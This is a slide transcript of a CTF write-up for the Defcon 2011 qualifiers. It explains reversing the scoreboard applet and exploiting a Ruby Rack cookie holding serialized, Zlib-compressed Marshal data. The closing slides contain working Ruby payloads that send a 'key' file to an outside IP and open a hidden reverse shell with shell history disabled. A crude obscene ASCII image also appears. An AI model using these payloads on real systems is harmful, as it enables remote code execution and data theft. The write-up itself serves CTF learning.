Defcon CTF quals
-
Upload
snyff -
Category
Technology
-
view
666 -
download
2
description
Transcript of Defcon CTF quals
Defcon CTF quals
Agenda
● Defcon CTF ● Defcon Quals 2011 ● The Score Board● Powtent Pownable 300
Defcon CTF
● One of the most prestigious CTF● Qualification to get in● Only 10 teams are qualified● Run by ddtek
Defcon CTF
● You get a FreeBSD box with X services:● Reverse each service● Protect each service● Attack others' service
Defcon CTF
● You get points for: ● Availability● Reading other teams' keys● Overwriting other teams' keys
(DEFACED)
Defcon CTF quals
● Dates:● From 03 Jun 2011 19:00:00 UTC● To 06 Jun 2011 00:00:00 UTC
● 53 non-stop hours
Defcon CTF quals
● 5 categories● 5 challenges per category● Challenges are progressively
opened
FIXME picture of score board
The Score Board
● Java applet● Annoying and slow● The organisation is late● Direct openssl connection
doesn't seem to work
The Score Board
● Let start reversing with jad● Class to communicate with the
server: biz/ddtek/quals/QualsClient.class
● Need to do some patching to remove UI related instructions
The Score Board
● Method to login● Method to get the matrix of
challenges as an array● Method to get the details for each
challenge
The Score Board
● Build 2 java apps to get score and to get new challenge
● Build an IRC alert bot for new challenge
● Fuzz/Try to inject ;)● And share it with the team
Powtent Pownables 300
● Ruby based ● HTTP based:
● Often the case ● No XSS or SQLi● Just vulnerable and weird web
servers
PP300: 2 paths ???
● The version of Webrick seems vulnerable:
WEBrick/1.3.1 (Ruby/1.8.7/2010-08-16)
● The cookie sent is identical between 2 HTTP requests without cookies...
Set-Cookie: rack.session=BAh7CSIlZU5wajRZam1VVEpUSUJiRTYraXE2cXZXY0NsWkVLdGMiAYhlTnBq%0ANFlqbVVUSlRJQmJFNitpcTZxdldjQ2xaRUt0Y0hVVEg2T3VyeGhDakNhWUJy%0ARWxWdjBhVnNDWjlJTlFFNndWcTFnWHlpYkVwSmo1ZUgyU1hxb2FxZ29LMWdv%0AS3FKdEFtWW9OQk5VWlZCMHh4S1prUUhYTHF1cnFxNmx3QWRoODBBZz09IiVl%0ATnFWbEQxdXd6QU1oWmNPUlE1UkVGbHFGMUE0QnVqUSIC8AFlTnFWbEQxdXd6%0AQU1oWmNPUlE1UkVGbHFGMUE0QnVqUUpjY29BZHFENGRGRE1tUWdmUFpLbEtp%0AZjJFRVJEN1lsOFluaysyUy92ZjkrSE05Zk1NTUNJOXpnQ2hQYzRkL3g0WGll%0ANGJWcjlwb0ZVTitwV1dsR1dNOHNYak5LR3NnemtUU1AwV3R1Rmp1Y0dwRnMz%0AcjcxZnZPYTZ3QzdpZktJMmtLdVhqUGxNaVIxcGcwUWhXbm5tSUdvVGpSNXpU%0AM1hUa0hDenExcnliWUdsYVFJVFhRL0JENUZ4RzdkczNkMVRGbVQrUkMzWnZI%0ASnBldkVlbWxUVXZoVTRSUWpFSUhCUC8yOTQ0NzVKNjVMNWxNQjhXNWZRbXdQ%0ARU1WUm9pSkpiSldQZVVXNmoycTRSOXRJSmFwaExIek1YdFNhTHhyVEZ5UmRs%0AS2ovaFk5WjBvWG1rOFlhODdHK042ek9aT0pqN1ZHb0lEaElTUkx0NkppeDVE%0AVStrS2lSMVRVRW0vVWNmRDRlcU14SE1xS0loOWxRWVQyTlB0RDR0S2N6Rmkr%0AMk1iV0pqTS9PaWNhQ2pabzE0eU4xRHR4OFBZM0krTWlqUk8xQTR1Ull0YWNr%0AUHZMWVM0N2JmdmVTK01qVEwzcEhFL204K24vN0ErYksrK0k9IiVtaDdjSiVo%0AOTlMUG4xelNvaDQsNDIhNmUzdDc4Q3ddaSIyZU5wajRWQ1N5U2dwS2JEUzF6%0AYzBNdGN6QUVKREsxTWpDd05EZlFCUi9RWEIKIiVlTnFGME0wS3dqQU1BT0NM%0AQjluWkJ3alpwQjFzeTkydCICBAFlTnFGME0wS3dqQU1BT0NMQjluWkJ3alpw%0AQjFzeTkydDBLTlA0TVZLNmhQc0JmTHdwdG9PTjVpbXRCVHk5U2M1SE84bmJH%0AQTNtTWhXZU43TnozUFErQ1VtSHY0SUNNeUVQd1VSeDJFUm5SOTl0d1lpQk8y%0AamlGR0JoZURIWlhTc2dFQ0tvQ2RFSDFoeTJuS0t3Y0FpS0MydHYyUkE3MTB0%0AaUZoRTdIczBzVHp3dVNrNkYvUlk5ZDNTUkVLZVBxYXZwa2VhOWU5QlVoOENX%0AR0FXdWNxbUd4bFFxaUU0aDdWeEc2RXBtNEZ5NWh0djd6QUd0VDVkdE5KcFN2%0AVzIxUXRTcVY1dg%3D%3D%0A
PP300: rack cookies
● Base64 encoding of Marshall objects
● Marshall =~ Serialization
z= Marshal.load(Base64.decode64(URI.decode(cookie)))
z= Marshal.load(Base64.decode64(URI.decode(cookie)))
> pp z{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" => "eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",
"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" => "eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXB\n",
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" => "eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgECKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpkea9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}
> z= Marshal.load(Base64.decode64(URI.decode(cookie))) > pp z.class Hash
z= Marshal.load(Base64.decode64(URI.decode(cookie)))
{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" => "eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",
"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" => "eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXB\n",
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" => "eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgECKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpkea9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}
How to lose an hour :/
{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" => "eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",
"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" => "eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXB\n",
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" => "eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgECKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpkea9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}
All values start with eN...
> s="eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6WVq1gXyibEPjj5eH2SXqoaQgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==" > Base64.decode64(s).each_byte do |c|> print "\\x%02x" % c> end
\x78\xda\x63\xe1\x88\xe6\x51\x32\x53\x20\x16\xc4\xeb\xe8\xaa\xea\xab\xd6\x70\x29\x59\x10\xab\x5c\x1d\x44\xc7\xe8\xeb\xab\xc6\x10\xa3\x09\xa6\x01\xac\x49\x55\xbf\x46\x95\xb0\x26\x7d\x20\xd4\x04\xe9\x6b\xea\xd6\x05\xf2\x89\xb1\x0f\x8e\x3e\x5e\x1f\x64\x97\xaa\x86\xaa\x82\x82\xb5\x82\x82\xaa\x26\xd0\x26\x62\x83\x41\x35\x46\x55\x07\x4c\x71\x29\x99\x10\x1d\x72\xea\xba\xba\xaa\xea\x5c\x00\x76\x1f\x34\x02
… googling for “\x78\xda” links to the zlib
After few lines of code
z.each do |p,v| puts puts Marshal.load(Zlib::Inflate.new.inflate(Base64.decode64(v)))end
And you get...
[ … ]
[ … ]
http://127.0.0.1:52801/
_//( oo\\\\ <_.\\\ \__/" //_`. ,@;@, ||/ )] ;@;@( \@;@;@;@;@;@,_|/ / | /a `@\_|@;@;@;@(_____.' | / )@:@;@;@;@/@:@;@#|"""| `--"'`;@;@;@;@|@;@;@`==\ ) `;@;\;@;\;@;@` || | || | \\ ( __||H| || | // / \=="#'= // ( // / |__V_| ''"' '"'___<<____)
If you follow, there were 4 values... … I removed the goatse...
We need to retrieve a file named “key”...
inte = "mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i"url = Marshal.load(Zlib::Inflate.new.inflate( Base64.decode64(z[inte])))pp urlurl += "key"
zzzz = Zlib::Deflate.new(Zlib::BEST_COMPRESSION) dst = Base64.encode64(zzzz.deflate(Marshal.dump(url), Zlib::FINISH))zzzz.closez[inte] = dstl = TCPSocket.new( "pwn508.ddtek.biz",52719)s = "#{URI.encode(Base64.encode64(Marshal.dump(z)))}"lol = "GET / HTTP/1.0\r\nCookie: rack.session=#{s}\r\n\r\n"puts loll.write lolputs l.read
And we get...
NOTHING!!!
So we need...
● A web server that responds with a Zlib compressed response that is base64 encoded
● This response should declare a function that will read a file or spawn a shell
Request with crafted cookie
Retrieve code to exec
Send key or reverse shell
Building the answer: read a filea = "proc { require 'socket';
TCPSocket.new(\"95.142.164.253\",1235).write(File.read(\"key\")) }"
zzzz = Zlib::Deflate.new(Zlib::BEST_COMPRESSION)dst = Base64.encode64(zzzz.deflate(a, Zlib::FINISH))zzzz.closeputs "HTTP/1.1 200 OK\r\nContent-length: "+dst.size.to_s+"\r\n\r\n"puts dst
a = "proc { require 'socket';$0=\"ps\";s = Socket.new(Socket::AF_INET,Socket::SOCK_STREAM,
Socket::IPPROTO_TCP);s.connect(Socket.pack_sockaddr_in(1235, '95.142.164.253'));[$stdin, $stdout, $stderr].each {|c| c.reopen s};system(\"export HISTFILE=/dev/null && /bin/sh -i\");[$stdin, $stdout, $stderr].each {|c| c.close}; }"
Payload for a shell:
Conclusion...
● Good fun
● Challenging